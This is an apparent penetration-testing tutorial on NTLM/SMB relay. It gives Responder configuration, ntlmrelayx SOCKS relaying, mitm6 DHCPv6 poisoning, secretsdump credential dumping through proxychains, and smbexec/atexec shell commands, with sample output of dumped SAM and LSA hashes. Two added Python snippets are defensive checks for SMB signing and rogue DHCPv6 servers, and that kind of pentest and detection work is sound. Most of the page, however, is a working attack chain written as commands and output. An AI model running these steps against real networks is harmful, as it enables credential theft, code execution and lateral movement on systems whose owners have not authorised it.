SMB Relay
This page deals with gaining code execution by relaying NTLMv1/2 hashes in a very effective manner.

Introduction

When capturing NTLMv1/2 hashes with tools like Responder, attackers have two options:
  • crack them to retrieve cleartext passwords
  • relay them to gain code execution on a target
The relayed user must have privileges on the target.

Valid targets

In order to relay hashes, we must have valid targets. Valid targets are machines with SMB Signing disabled.
SMB Signing is disabled by default on every Windows OS, except Windows Server.
To create a list file of valid targets, use CrackMapExec:
    cme smb <networkIP>/<cidr> --gen-relay-list relayTargets.txt
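CrackMapExec decides whether a host is a relay target by reading the SecurityMode field of the SMB2 NEGOTIATE response; the bit that matters is SIGNING_REQUIRED, because SMB2 servers always advertise SIGNING_ENABLED even when signing is not enforced. The decoder below is an added example (not CrackMapExec's or Impacket's code) that a defender can run over captured negotiate responses to verify signing enforcement; the response builder and its values are constructed for illustration.

```python
import struct

# SMB2 constants from MS-SMB2; the builder below produces a constructed sample, not a capture
SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002


def build_negotiate_response(security_mode, dialect=0x0302):
    """Constructed sample: 64-byte SMB2 header plus the start of a NEGOTIATE response body."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    # StructureSize 65, SecurityMode, DialectRevision, NegotiateContextCount; rest zero-padded
    body = struct.pack("<HHHH", 65, security_mode, dialect, 0) + b"\x00" * 57
    return header + body


def parse_signing_mode(data):
    """Extract the SecurityMode bits from an SMB2 NEGOTIATE response."""
    if len(data) < 70 or data[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    struct_size, _, _, command, _, flags = struct.unpack_from("<HHIHHI", data, 4)
    if struct_size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    body_size, security_mode, dialect = struct.unpack_from("<HHH", data, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response size")
    return {
        "dialect": dialect,
        # Servers always set SIGNING_ENABLED; only SIGNING_REQUIRED stops relayed sessions
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def is_relay_target(data):
    """True when the server does not require signing, i.e. it would appear in --gen-relay-list."""
    return not parse_signing_mode(data)["signing_required"]


if __name__ == "__main__":
    workstation = build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED)
    hardened = build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED)
    print("default workstation relayable:", is_relay_target(workstation))  # True
    print("signing-required host relayable:", is_relay_target(hardened))   # False
```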

Capture hashes

To capture NTLMv2 hashes, simply use Responder. Before running it, edit Responder.conf so that Responder does not answer SMB and HTTP itself (those connections must reach the relay tool instead):
    [Responder Core]

    ; Servers to start
    SQL = On
    SMB = Off # Turn this off
    Kerberos = On
    FTP = On
    POP = On
    SMTP = On
    IMAP = On
    HTTP = Off # Turn this off
    HTTPS = On
    DNS = On
    LDAP = On
Then fire up Responder:
    python Responder.py -I <interface> -r -d -w

Relaying hashes

Instead of cracking the captured hashes, we can relay them to our valid targets to gain code execution there. For that purpose, you can use Responder's MultiRelay or Impacket's ntlmrelayx.
With ntlmrelayx, you can keep and reuse sessions instead of executing a one-shot attack.
One-Shot Attack vs Socks Support.
To use SOCKS support, simply use the -socks switch:
    ./ntlmrelayx.py -tf relayTargets.txt -socks -smb2support
Since MS08-068, it is impossible to relay a hash back to the machine it comes from (reflective attack).

Abusing IPv6

Until now, we have abused the LLMNR protocol to capture NTLMv2 hashes. It works great, but we can increase the effectiveness of hash relaying by abusing the IPv6 protocol too.
The idea is to answer the DHCPv6 requests that machines on the network send, setting the attacker's IP as their default IPv6 DNS server. Because Windows prefers IPv6 over IPv4, victims then resolve names through the attacker machine and are forced to authenticate against it.
Abusing IPv6 protocol with mitm6.
To use mitm6:
    sudo mitm6 -d <domain>
To minimize the impact on the network, the lease will expire within 5 minutes when mitm6 is stopped, which removes the DNS server from the victims' configuration.
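A rogue DHCPv6 server is visible on the wire: mitm6 answers with Advertise/Reply messages carrying OPTION_DNS_SERVERS (option 23) pointing at the attacker. The parser below is an added example, not mitm6's code, that flags Advertise/Reply messages whose DNS servers are not on an allowlist; the messages it checks are constructed samples, and on a network with no legitimate DHCPv6 server the allowlist is simply empty, so every such message is flagged.

```python
import ipaddress
import struct

# DHCPv6 message types and option codes from RFC 8415
SOLICIT, ADVERTISE, REPLY = 1, 2, 7
OPTION_DNS_SERVERS = 23


def parse_dhcpv6(payload):
    """Parse a DHCPv6 UDP payload into (msg_type, transaction_id, {option_code: [data, ...]})."""
    if len(payload) < 4:
        raise ValueError("truncated DHCPv6 message")
    msg_type = payload[0]
    txid = int.from_bytes(payload[1:4], "big")
    options, pos = {}, 4
    while pos + 4 <= len(payload):
        code, length = struct.unpack_from(">HH", payload, pos)
        data = payload[pos + 4:pos + 4 + length]
        if len(data) != length:
            raise ValueError("option %d runs past end of message" % code)
        options.setdefault(code, []).append(data)
        pos += 4 + length
    return msg_type, txid, options


def dns_servers(options):
    """OPTION_DNS_SERVERS carries a list of 16-byte IPv6 addresses."""
    out = []
    for data in options.get(OPTION_DNS_SERVERS, []):
        for i in range(0, len(data) - len(data) % 16, 16):
            out.append(ipaddress.IPv6Address(data[i:i + 16]))
    return out


def rogue_dhcpv6_dns(payload, allowed_dns):
    """Return DNS servers pushed by an Advertise/Reply that are not on the allowlist."""
    msg_type, _, options = parse_dhcpv6(payload)
    if msg_type not in (ADVERTISE, REPLY):
        return []  # client-originated messages (Solicit, Request, ...) carry no DNS assignment
    allowed = {ipaddress.IPv6Address(a) for a in allowed_dns}
    return [str(a) for a in dns_servers(options) if a not in allowed]


def build_sample(msg_type, dns):
    """Constructed sample message (not a capture): type, fixed txid, OPTION_DNS_SERVERS only."""
    addr = ipaddress.IPv6Address(dns).packed
    return bytes([msg_type]) + b"\x00\x12\x34" + struct.pack(">HH", OPTION_DNS_SERVERS, 16) + addr


if __name__ == "__main__":
    # A network without DHCPv6: any Advertise naming a DNS server is suspicious
    print(rogue_dhcpv6_dns(build_sample(ADVERTISE, "fe80::1"), []))  # ['fe80::1']
```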

What to do with sessions?

Many sessions will be established by chaining these exploits:
    ntlmrelayx> socks
    Protocol  Target          Username                  Port
    --------  --------------  ------------------------  ----
    SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
    MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
    MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
    SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
    SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
    SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
    SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
    IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143
    ...
To interact with these sessions, you need to edit /etc/proxychains.conf:
    [ProxyList]
    socks4 <yourIP> 1080

Retrieving local hashes

Then you can retrieve the targets' local hashes with Impacket's secretsdump. You can type anything when you are prompted for a password, because the relayed session held by ntlmrelayx is used instead:
    [email protected] # proxychains ./secretsdump.py vulnerable/[email protected]
    ProxyChains-3.1 (http://proxychains.sf.net)
    Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

    Password:
    |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
    [*] Service RemoteRegistry is in stopped state
    [*] Starting service RemoteRegistry
    [*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
    [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
    HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
    [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
    pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
    Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
    normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
    serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
    normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
    [*] Dumping LSA Secrets
    [*] $MACHINE.ACC
    VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
    [*] DPAPI_SYSTEM
    0000   01 00 00 00 1C 17 F6 05  23 2B E5 97 95 E0 E4 DF   ........#+......
    0010   47 96 CC 79 1A C2 6E 14  44 A3 C1 9E 6D 7C 93 F3   G..y..n.D...m|..
    0020   9A EC C6 8A 49 79 20 9D  B5 FB 26 79               ....Iy ...&y
    DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
    [*] NL$KM
    0000   EB 5C 93 44 7B 08 65 27  9A D8 36 75 09 A9 CF B3   .\.D{.e'..6u....
    0010   4F AF EC DF 61 63 93 E5  20 C5 4F EF 3C 65 FD 8C   O...ac.. .O.<e..
    |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK

Getting code execution

You can also obtain a shell with Impacket's smbexec and atexec:
    proxychains smbexec.py <domain>/<relayedUser>@192.168.10.60
    proxychains atexec.py <domain>/<relayedUser>@192.168.10.60 "<cmd>"
psexec and wmiexec do not work here (see references).

Using SMBClient

You can also browse the target's shares with smbclient:
    [email protected]:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator
    ProxyChains-3.1 (http://proxychains.sf.net)
    WARNING: The "syslog" option is deprecated
    |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
    Enter VULNERABLE\Administrator's password:
    Try "help" to get a list of possible commands.
    smb: \> dir
      $Recycle.Bin                      DHS           0  Thu Dec  7 19:08:00 2017
      Documents and Settings            DHS           0  Tue Jul 14 01:08:10 2009
      pagefile.sys                      AHS  1073741824  Thu May  3 16:32:43 2018
      PerfLogs                            D           0  Mon Jul 13 23:20:08 2009
      Program Files                      DR           0  Fri Dec  1 17:16:28 2017
      Program Files (x86)                DR           0  Fri Dec  1 17:03:57 2017
      ProgramData                        DH           0  Tue Feb 27 15:02:13 2018
      Recovery                          DHS           0  Wed Sep 30 18:00:31 2015
      System Volume Information         DHS           0  Wed Jun  6 12:24:46 2018
      tmp                                 D           0  Sun Mar 25 09:49:15 2018
      Users                              DR           0  Thu Dec  7 19:07:54 2017
      Windows                             D           0  Tue Feb 27 16:25:59 2018

                5216767 blocks of size 4096. 609996 blocks available
    smb: \>
Many other protocols can be relayed: IMAP, LDAP, MSSQL, etc. (see references).

References